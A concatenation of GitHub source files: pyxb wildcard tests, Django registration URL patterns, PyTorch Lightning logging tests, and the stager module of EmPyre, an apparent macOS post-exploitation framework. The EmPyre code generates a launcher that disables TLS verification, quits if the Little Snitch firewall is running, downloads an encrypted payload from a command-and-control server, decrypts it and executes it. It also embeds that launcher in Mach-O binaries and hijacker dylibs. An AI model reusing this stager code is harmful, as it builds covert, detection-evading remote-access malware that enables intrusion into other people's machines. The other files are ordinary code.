self.assertEqual(set([ns2]), ISECT([set([ns1, ns2]), set([ns2, None])]))
self.assertEqual(set([ns2, None]), ISECT([set([None, ns1, ns2]), set([ns2, None])]))
self.assertEqual(set([]), ISECT([set([ns1]), set([ns2, None])]))
self.assertEqual(set([]), ISECT([set([ns1]), set([ns2, ns1]), set([ns2, None])]))
self.assertEqual(set([ns1]), ISECT([set([ns1, None]), set([None, ns2, ns1]), set([ns1, ns2])]))
def testIntersection_5 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertRaises(SchemaValidationError, ISECT, [nc_not(ns1), nc_not(ns2)])
def testIntersection_6 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_not(ns1), ISECT([nc_not(ns1), nc_not(None)]))
class TestWildcard (unittest.TestCase):
def setUp (self):
# Hide the warning about failure to convert DOM node {}third
# to a binding
self.__basis_log = logging.getLogger('pyxb.binding.basis')
self.__basis_loglevel = self.__basis_log.level
self.__basis_log.setLevel(logging.ERROR)
def tearDown (self):
pyxb.RequireValidWhenParsing(True)
self.__basis_log.level = self.__basis_loglevel
def testElement (self):
# NB: Test on CTD, not element
self.assertTrue(wrapper_._HasWildcardElement)
xmls = '<wrapper><first/><second/><third/></wrapper>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
# Alternative parser path
instance = CreateFromDocument(xmls)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
def _validateWildcardWrappingRecognized (self, instance):
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(1, len(instance.wildcardElements()))
dom = instance.wildcardElements()[0]
self.assertTrue(isinstance(dom, Node))
self.assertEqual(Node.ELEMENT_NODE, dom.nodeType)
self.assertEqual('third', dom.nodeName)
self.assertEqual(1, len(dom.childNodes))
cdom = dom.firstChild
self.assertTrue(isinstance(cdom, Node))
self.assertEqual(Node.ELEMENT_NODE, cdom.nodeType)
self.assertEqual('selt', cdom.nodeName)
ccdom = cdom.firstChild
self.assertTrue(isinstance(ccdom, Node))
self.assertEqual(Node.TEXT_NODE, ccdom.nodeType)
self.assertEqual('text', ccdom.data)
def testWildcardWrappingRecognized (self):
# NB: Test on CTD, not element
self.assertTrue(wrapper_._HasWildcardElement)
xmls = '<wrapper><first/><second/><third><selt>text</selt></third></wrapper>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self._validateWildcardWrappingRecognized(instance)
# Alternative parser path
instance = CreateFromDocument(xmls)
self._validateWildcardWrappingRecognized(instance)
def testMultiElement (self):
tested_overmax = False
for rep in range(0, 6):
xmls = '<wrapper><first/><second/>%s</wrapper>' % (''.join(rep * ['<third/>']),)
doc = pyxb.utils.domutils.StringToDOM(xmls)
if 3 >= rep:
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardElements(), list))
self.assertEqual(rep, len(instance.wildcardElements()))
for i in range(0, rep):
self.assertEqual('third', instance.wildcardElements()[i].nodeName)
else:
tested_overmax = True
self.assertRaises(UnrecognizedContentError, wrapper.createFromDOM, doc.documentElement)
self.assertTrue(tested_overmax)
def testAttribute (self):
# NB: Test on CTD, not element
self.assertTrue(isinstance(wrapper_._AttributeWildcard, pyxb.binding.content.Wildcard))
xmls = '<wrapper myattr="true" auxattr="somevalue"/>'
doc = pyxb.utils.domutils.StringToDOM(xmls)
instance = wrapper.createFromDOM(doc.documentElement)
self.assertTrue(isinstance(instance.wildcardAttributeMap(), dict))
self.assertEqual(1, len(instance.wildcardAttributeMap()))
self.assertEqual('somevalue', instance.wildcardAttributeMap()['auxattr'])
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "3a9880f50c30a5851a4ccdcd7c995807",
"timestamp": "",
"source": "github",
"line_count": 220,
"max_line_length": 103,
"avg_line_length": 45.013636363636365,
"alnum_prop": 0.6368777138240937,
"repo_name": "CantemoInternal/pyxb",
"id": "46216176a251d2994755fe786372dc86a5ef17bf",
"size": "9927",
"binary": false,
"copies": "2",
"ref": "refs/heads/next",
"path": "tests/drivers/test-wildcard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "383"
},
{
"name": "Python",
"bytes": "1935375"
},
{
"name": "Shell",
"bytes": "27215"
}
],
"symlink_target": ""
}
|
"""
URL patterns for the views included in ``django.contrib.auth``.
Including these URLs (via the ``include()`` directive) will set up the
following patterns based at whatever URL prefix they are included
under:
* User login at ``login/``.
* User logout at ``logout/``.
* The two-step password change at ``password/change/`` and
``password/change/done/``.
* The four-step password reset at ``password/reset/``,
``password/reset/confirm/``, ``password/reset/complete/`` and
``password/reset/done/``.
The default registration backend already has an ``include()`` for
these URLs, so under the default setup it is not necessary to manually
include these views. Other backends may or may not include them;
consult a specific backend's documentation for details.
"""
from django.conf.urls import include
from django.conf.urls import url
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.html'},
name='auth_login'),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.html'},
name='auth_logout'),
url(r'^password/change/$',
auth_views.password_change,
{'post_change_redirect': reverse_lazy('auth_password_change_done')},
name='auth_password_change'),
url(r'^password/change/done/$',
auth_views.password_change_done,
name='auth_password_change_done'),
url(r'^password/reset/$',
auth_views.password_reset,
{'post_reset_redirect': reverse_lazy('auth_password_reset_done')},
name='auth_password_reset'),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
name='auth_password_reset_complete'),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
name='auth_password_reset_done'),
]
from django import get_version
from distutils.version import LooseVersion
if (LooseVersion(get_version()) >= LooseVersion('1.6')):
urlpatterns += [
url(r'^password/reset/confirm/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>.+)/$',
auth_views.password_reset_confirm,
{'post_reset_redirect': reverse_lazy('auth_password_reset_complete')},
name='auth_password_reset_confirm')
]
else:
urlpatterns += [
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]{1,13})-(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
auth_views.password_reset_confirm,
{'post_reset_redirect': reverse_lazy('auth_password_reset_complete')},
name='auth_password_reset_confirm')
]
|
{
"content_hash": "2cf2d64d9414cf144aeb5214942bdbdb",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 138,
"avg_line_length": 43.81818181818182,
"alnum_prop": 0.5245998814463545,
"repo_name": "dresl/django18-bootstrap",
"id": "3ff5d3d3291704ef9714f74e7c99d874e77f18d1",
"size": "3374",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "registration/auth_urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "124"
},
{
"name": "HTML",
"bytes": "17738"
},
{
"name": "JavaScript",
"bytes": "1125"
},
{
"name": "Python",
"bytes": "89405"
},
{
"name": "Shell",
"bytes": "286"
}
],
"symlink_target": ""
}
|
"""
Stager handling functionality for EmPyre.
"""
import fnmatch
import imp
import http
import helpers
import encryption
import os
import base64
class Stagers:
def __init__(self, MainMenu, args):
self.mainMenu = MainMenu
# pull the database connection object out of the main menu
self.conn = self.mainMenu.conn
self.args = args
# stager module format:
# [ ("stager_name", instance) ]
self.stagers = {}
# pull out the code install path from the database config
cur = self.conn.cursor()
cur.execute("SELECT install_path FROM config")
self.installPath = cur.fetchone()[0]
cur.execute("SELECT default_profile FROM config")
self.userAgent = (cur.fetchone()[0]).split("|")[1]
cur.close()
# pull out staging information from the main menu
self.stage0 = self.mainMenu.stage0
self.stage1 = self.mainMenu.stage1
self.stage2 = self.mainMenu.stage2
self.load_stagers()
def load_stagers(self):
"""
Load stagers from the install + "/lib/stagers/*" path
"""
rootPath = self.installPath + 'lib/stagers/'
pattern = '*.py'
for root, dirs, files in os.walk(rootPath):
for filename in fnmatch.filter(files, pattern):
filePath = os.path.join(root, filename)
# extract just the module name from the full path
stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
# instantiate the module and save it to the internal cache
self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
def set_stager_option(self, option, value):
"""
Sets an option for all stagers.
"""
for name, stager in self.stagers.iteritems():
for stagerOption, stagerValue in stager.options.iteritems():
if stagerOption == option:
stager.options[option]['Value'] = str(value)
def generate_stager(self, server, key, profile, encrypt=True, encode=False):
"""
Generate the Python stager that will perform
key negotiation with the server and kick off the agent.
"""
# TODO: implement for Python
# read in the stager base
f = open(self.installPath + "/data/agent/stager.py")
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
# first line of randomized text to change up the ending RC4 string
randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
stager = randomHeader + stager
if server.endswith("/"):
server = server[0:-1]
# # patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
# # base64 encode the stager and return it
# if encode:
# return ""
if encrypt:
# return an encrypted version of the stager ("normal" staging)
# return encryption.xor_encrypt(stager, key)
return encryption.rc4(key, stager)
else:
# otherwise return the case-randomized stager
return stager
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True):
"""
Generate the Python stager for hop.php redirectors that
will perform key negotiation with the server and kick off the agent.
"""
# read in the stager base
f = open(self.installPath + "./data/agent/stager_hop.py")
stager = f.read()
f.close()
stager = helpers.strip_python_comments(stager)
# first line of randomized text to change up the ending RC4 string
randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
stager = randomHeader + stager
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
# # base64 encode the stager and return it
# if encode:
# return ""
if encrypt:
# return an encrypted version of the stager ("normal" staging)
# return encryption.xor_encrypt(stager, key)
return encryption.rc4(key, stager)
else:
# otherwise return the case-randomized stager
return stager
def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit):
"""
Generate "standard API" functionality, i.e. the actual agent.py that runs.
This should always be sent over encrypted comms.
"""
f = open(self.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
b64DefaultPage = base64.b64encode(http.default_page())
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultPage = base64.b64decode("")', 'defaultPage = base64.b64decode("%s")' % (b64DefaultPage))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
def generate_launcher_uri(self, server, encode=True, pivotServer="", hop=False):
"""
Generate a base launcher URI.
This is used in the management/psinject module.
"""
if hop:
# generate the base64 encoded information for the hop translation
checksum = "?" + helpers.encode_base64(server + "&" + self.stage0)
else:
# get a valid staging checksum uri
checksum = self.stage0
if pivotServer != "":
checksum += "?" + helpers.encode_base64(pivotServer)
if server.count("/") == 2 and not server.endswith("/"):
server += "/"
return server + checksum
def generate_launcher(self, listenerName, encode=True, userAgent="default", littlesnitch='True'):
"""
Generate the initial Python 'download cradle' with a specified
c2 server and a valid HTTP checksum.
listenerName -> a name of a validly registered listener
userAgent -> "default" uses the UA from the default profile in the database
"none" sets no user agent
any other text is used as the user-agent
"""
# if we don't have a valid listener, return nothing
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
# extract the staging information from this specified listener
(server, stagingKey, pivotServer, hop) = self.mainMenu.listeners.get_stager_config(listenerName)
# if UA is 'default', use the UA from the default profile in the database
if userAgent.lower() == "default":
userAgent = self.userAgent
# get the launching stage0 URI
stage0uri = self.generate_launcher_uri(server, encode, pivotServer, hop)
# adopted from MSF's python meterpreter staging
# https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/python/reverse_http.rb
# first line of randomized text to change up the ending RC4 string
launcherBase = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
if "https" in stage0uri:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
launcherBase += "import sys, urllib2;"
try:
if littlesnitch.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stagger: " + str(e)
print helpers.color(p, color="Yellow")
launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "o.addheaders=[('User-Agent',UA)];"
launcherBase += "a=o.open('%s').read();" % (stage0uri)
launcherBase += "key='%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in a:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
# base64 encode the stager and return it
if encode:
launchEncoded = base64.b64encode(launcherBase)
# launcher = "python -c \"import sys,base64;exec(base64.b64decode('%s'));\"" %(launchEncoded)
launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
def generate_hop_php(self, server, resources):
"""
Generates a hop.php file with the specified target server
and resource URIs.
"""
# read in the hop.php base
f = open(self.installPath + "/data/misc/hop.php")
hop = f.read()
f.close()
# make sure the server ends with "/"
if not server.endswith("/"):
server += "/"
# patch in the server and resources
hop = hop.replace("REPLACE_SERVER", server)
hop = hop.replace("REPLACE_RESOURCES", resources)
return hop
def generate_macho(self, launcherCode):
"""
Generates a macho binary with an embedded python interpreter that runs the launcher code
"""
import macholib.MachO
MH_EXECUTE = 2
f = open(self.installPath + "/data/misc/machotemplate", 'rb')
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
print helpers.color("[!] Macho binary template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64:
count += 1
if cmd[count].segname.strip('\x00') == '__TEXT' and cmd[count].nsects > 0:
count += 1
for section in cmd[count]:
if section.sectname.strip('\x00') == '__cstring':
offset = int(section.offset)
placeHolderSz = int(section.size) - 13
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
patchedMachO = template[:offset]+launcher+template[(offset+len(launcher)):]
return patchedMachO
else:
print helpers.color("[!] Unable to patch MachO binary")
def generate_dylib(self, launcherCode, arch, hijacker):
"""
Generates a dylib with an embedded python interpreter and runs launcher code when loaded into an application.
"""
import macholib.MachO
MH_DYLIB = 6
if hijacker.lower() == 'true':
if arch == 'x86':
f = open(self.installPath + "/data/misc/hijackers/template.dylib", "rb")
else:
f = open(self.installPath + "/data/misc/hijackers/template64.dylib", "rb")
else:
if arch == 'x86':
f = open(self.installPath + "/data/misc/templateLauncher.dylib", "rb")
else:
f = open(self.installPath + "/data/misc/templateLauncher64.dylib", "rb")
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_DYLIB:
print helpers.color("[!] Dylib template is not the correct filetype")
return ""
cmds = macho.headers[0].commands
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64 or int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT:
count += 1
if cmd[count].segname.strip('\x00') == '__TEXT' and cmd[count].nsects > 0:
count += 1
for section in cmd[count]:
if section.sectname.strip('\x00') == '__cstring':
offset = int(section.offset)
placeHolderSz = int(section.size) - 52
template = f.read()
f.close()
if placeHolderSz and offset:
launcher = launcherCode + "\x00" * (placeHolderSz - len(launcherCode))
patchedDylib = template[:offset]+launcher+template[(offset+len(launcher)):]
return patchedDylib
else:
print helpers.color("[!] Unable to patch dylib")
|
{
"content_hash": "3ab1efd50cffa62e45db2d08cf8639a3",
"timestamp": "",
"source": "github",
"line_count": 392,
"max_line_length": 185,
"avg_line_length": 38.05357142857143,
"alnum_prop": 0.5769256552926192,
"repo_name": "EmpireProject/EmPyre",
"id": "c5b7e9705ed30eb8a32a19fb1fe7ade2b0caf1c9",
"size": "14917",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/common/stagers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2563"
},
{
"name": "Python",
"bytes": "1142712"
},
{
"name": "Ruby",
"bytes": "4105"
},
{
"name": "Shell",
"bytes": "2490"
}
],
"symlink_target": ""
}
|
"""
Test logging in the evaluation loop
"""
import collections
import itertools
from unittest import mock
from unittest.mock import call
import numpy as np
import pytest
import torch
from pytorch_lightning import callbacks, Trainer
from pytorch_lightning.loggers import TensorBoardLogger
from tests.helpers import BoringModel, RandomDataset
def test__validation_step__log(tmpdir):
"""
Tests that validation_step can log
"""
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
out = super().training_step(batch, batch_idx)
self.log("a", out["loss"], on_step=True, on_epoch=True)
self.log("a2", 2)
return out
def validation_step(self, batch, batch_idx):
out = super().validation_step(batch, batch_idx)
self.log("b", out["x"], on_step=True, on_epoch=True)
return out
model = TestModel()
model.validation_step_end = None
model.validation_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
assert set(trainer.logged_metrics) == {"a2", "a_step", "a_epoch", "b_step", "b_epoch", "epoch"}
# we don't want to enable val metrics during steps because it is not something that users should do
# on purpose DO NOT allow b_step... it's silly to monitor val step metrics
assert set(trainer.callback_metrics) == {"a", "a2", "b", "a_epoch", "b_epoch", "a_step"}
def test__validation_step__epoch_end__log(tmpdir):
"""
Tests that validation_epoch_end can log
"""
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
out = super().training_step(batch, batch_idx)
self.log("a", out["loss"])
self.log("b", out["loss"], on_step=True, on_epoch=True)
return out
def validation_step(self, batch, batch_idx):
out = super().validation_step(batch, batch_idx)
self.log("c", out["x"])
self.log("d", out["x"], on_step=True, on_epoch=True)
return out
def validation_epoch_end(self, outputs):
self.log("g", torch.tensor(2, device=self.device), on_epoch=True)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
# make sure all the metrics are available for loggers
assert set(trainer.logged_metrics) == {"epoch", "a", "b_step", "b_epoch", "c", "d_step", "d_epoch", "g"}
assert not trainer.progress_bar_metrics
# we don't want to enable val metrics during steps because it is not something that users should do
assert set(trainer.callback_metrics) == {"a", "b", "b_epoch", "c", "d", "d_epoch", "g", "b_step"}
@pytest.mark.parametrize(["batches", "log_interval", "max_epochs"], [(1, 1, 1), (64, 32, 2)])
def test_eval_epoch_logging(tmpdir, batches, log_interval, max_epochs):
class TestModel(BoringModel):
def validation_epoch_end(self, outputs):
self.log("c", torch.tensor(2), on_epoch=True, prog_bar=True, logger=True)
self.log("d/e/f", 2)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=batches,
limit_val_batches=batches,
max_epochs=max_epochs,
log_every_n_steps=log_interval,
weights_summary=None,
)
trainer.fit(model)
# assert the loggers received the expected number
logged_metrics = set(trainer.logged_metrics)
assert logged_metrics == {"c", "d/e/f", "epoch"}
pbar_metrics = set(trainer.progress_bar_metrics)
assert pbar_metrics == {"c"}
# make sure all the metrics are available for callbacks
callback_metrics = set(trainer.callback_metrics)
assert callback_metrics == (logged_metrics | pbar_metrics) - {"epoch"}
def test_eval_float_logging(tmpdir):
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("a", 12.0)
return {"x": loss}
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
assert set(trainer.logged_metrics) == {"a", "epoch"}
def test_eval_logging_auto_reduce(tmpdir):
class TestModel(BoringModel):
val_losses = []
manual_epoch_end_mean = None
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.val_losses.append(loss)
self.log("val_loss", loss, on_epoch=True, on_step=True, prog_bar=True)
return {"x": loss}
def validation_epoch_end(self, outputs) -> None:
for passed_in, manually_tracked in zip(outputs, self.val_losses):
assert passed_in["x"] == manually_tracked
self.manual_epoch_end_mean = torch.stack([x["x"] for x in outputs]).mean()
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=3,
limit_val_batches=3,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
num_sanity_val_steps=0,
)
trainer.fit(model)
# make sure all the metrics are available for callbacks
assert set(trainer.callback_metrics) == {"val_loss", "val_loss_epoch"}
# make sure values are correct
assert trainer.logged_metrics["val_loss_epoch"] == model.manual_epoch_end_mean
assert trainer.callback_metrics["val_loss_epoch"] == model.manual_epoch_end_mean
assert trainer.callback_metrics["val_loss"] == model.manual_epoch_end_mean
assert trainer.logged_metrics["val_loss_step"] == model.val_losses[-1]
@pytest.mark.parametrize(["batches", "log_interval", "max_epochs"], [(1, 1, 1), (64, 32, 2)])
def test_eval_epoch_only_logging(tmpdir, batches, log_interval, max_epochs):
"""
Tests that test_epoch_end can be used to log, and we return them in the results.
"""
class TestModel(BoringModel):
def test_epoch_end(self, outputs):
self.log("c", torch.tensor(2))
self.log("d/e/f", 2)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=max_epochs,
limit_test_batches=batches,
log_every_n_steps=log_interval,
weights_summary=None,
)
results = trainer.test(model)
assert len(results) == 1
assert results[0] == {"c": torch.tensor(2), "d/e/f": 2}
@pytest.mark.parametrize("suffix", (False, True))
def test_multi_dataloaders_add_suffix_properly(tmpdir, suffix):
class TestModel(BoringModel):
def test_step(self, batch, batch_idx, dataloader_idx=0):
out = super().test_step(batch, batch_idx)
self.log("test_loss", out["y"], on_step=True, on_epoch=True)
return out
def test_dataloader(self):
if suffix:
return [
torch.utils.data.DataLoader(RandomDataset(32, 64)),
torch.utils.data.DataLoader(RandomDataset(32, 64)),
]
return super().test_dataloader()
model = TestModel()
model.test_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=0,
limit_val_batches=0,
limit_test_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
)
results = trainer.test(model)
for i, r in enumerate(results):
expected = {"test_loss", "test_loss_epoch"}
if suffix:
expected = {e + f"/dataloader_idx_{i}" for e in expected}
assert set(r) == expected
def test_log_works_in_val_callback(tmpdir):
"""
Tests that log can be called within callback
"""
class TestCallback(callbacks.Callback):
count = 0
choices = [False, True]
# used to compute expected values
logged_values = collections.defaultdict(list)
call_counter = collections.Counter()
logged_arguments = {}
def make_logging(self, pl_module, func_name, on_steps, on_epochs, prob_bars):
self.call_counter.update([func_name])
for idx, (on_step, on_epoch, prog_bar) in enumerate(itertools.product(on_steps, on_epochs, prob_bars)):
fx = f"{func_name}_{idx}"
pl_module.log(fx, self.count, on_step=on_step, on_epoch=on_epoch, prog_bar=prog_bar)
self.logged_values[fx].append(self.count)
self.logged_arguments[fx] = {"on_step": on_step, "on_epoch": on_epoch, "prog_bar": prog_bar}
self.count += 1
def on_validation_start(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_epoch_start(self, trainer, pl_module):
if trainer.validating:
self.make_logging(
pl_module, "on_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_validation_epoch_start(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_validation_batch_end(self, _, pl_module, *__):
self.make_logging(
pl_module,
"on_validation_batch_end",
on_steps=self.choices,
on_epochs=self.choices,
prob_bars=self.choices,
)
def on_epoch_end(self, trainer, pl_module):
if trainer.validating:
self.make_logging(pl_module, "on_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices)
def on_validation_epoch_end(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
loss = super().validation_step(batch, batch_idx)["x"]
self.log("val_loss", loss)
model = TestModel()
model.validation_epoch_end = None
cb = TestCallback()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=1,
limit_val_batches=4,
num_sanity_val_steps=0,
max_epochs=1,
callbacks=[cb],
)
trainer.fit(model)
assert cb.call_counter == {
"on_validation_batch_end": 4,
"on_validation_start": 1,
"on_epoch_start": 1,
"on_validation_epoch_start": 1,
"on_validation_epoch_end": 1,
"on_epoch_end": 1,
}
def get_expected(on_epoch, values):
reduction = np.mean if on_epoch else np.max
return reduction(values)
for fx, value in trainer.callback_metrics.items():
actual = value.item()
if fx not in cb.logged_arguments:
continue
on_epoch = cb.logged_arguments[fx]["on_epoch"]
values = cb.logged_values[fx]
expected = get_expected(on_epoch, values)
assert actual == expected
for fx, attrs in cb.logged_arguments.items():
should_include = attrs["prog_bar"] and attrs["on_step"] ^ attrs["on_epoch"]
is_included = fx in trainer.progress_bar_metrics
assert is_included if should_include else not is_included
def test_log_works_in_test_callback(tmpdir):
"""
Tests that log can be called within callback
"""
class TestCallback(callbacks.Callback):
# helpers
count = 0
choices = [False, True]
# used to compute expected values
callback_funcs_called = collections.defaultdict(list)
funcs_called_count = collections.defaultdict(int)
funcs_attr = {}
def make_logging(self, pl_module, func_name, on_steps, on_epochs, prob_bars):
original_func_name = func_name[:]
self.funcs_called_count[original_func_name] += 1
for idx, (on_step, on_epoch, prog_bar) in enumerate(itertools.product(on_steps, on_epochs, prob_bars)):
func_name = original_func_name[:]
custom_func_name = f"{idx}_{func_name}"
pl_module.log(custom_func_name, self.count, on_step=on_step, on_epoch=on_epoch, prog_bar=prog_bar)
num_dl_ext = ""
if pl_module._current_dataloader_idx is not None:
dl_idx = pl_module._current_dataloader_idx
num_dl_ext = f"/dataloader_idx_{dl_idx}"
func_name += num_dl_ext
# catch information for verification
self.callback_funcs_called[func_name].append([self.count])
self.funcs_attr[custom_func_name + num_dl_ext] = {
"on_step": on_step,
"on_epoch": on_epoch,
"prog_bar": prog_bar,
"func_name": func_name,
}
if on_step and on_epoch:
self.funcs_attr[f"{custom_func_name}_step" + num_dl_ext] = {
"on_step": True,
"on_epoch": False,
"prog_bar": prog_bar,
"func_name": func_name,
}
self.funcs_attr[f"{custom_func_name}_epoch" + num_dl_ext] = {
"on_step": False,
"on_epoch": True,
"prog_bar": prog_bar,
"func_name": func_name,
}
def on_test_start(self, _, pl_module):
self.make_logging(pl_module, "on_test_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices)
def on_test_epoch_start(self, _, pl_module):
self.make_logging(
pl_module, "on_test_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_test_batch_end(self, _, pl_module, *__):
self.make_logging(
pl_module, "on_test_batch_end", on_steps=self.choices, on_epochs=self.choices, prob_bars=self.choices
)
def on_test_epoch_end(self, _, pl_module):
self.make_logging(
pl_module, "on_test_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
num_dataloaders = 2
class TestModel(BoringModel):
seen_losses = {i: [] for i in range(num_dataloaders)}
def test_step(self, batch, batch_idx, dataloader_idx=None):
loss = super().test_step(batch, batch_idx)["y"]
self.log("test_loss", loss)
self.seen_losses[dataloader_idx].append(loss)
def test_dataloader(self):
return [torch.utils.data.DataLoader(RandomDataset(32, 64)) for _ in range(num_dataloaders)]
model = TestModel()
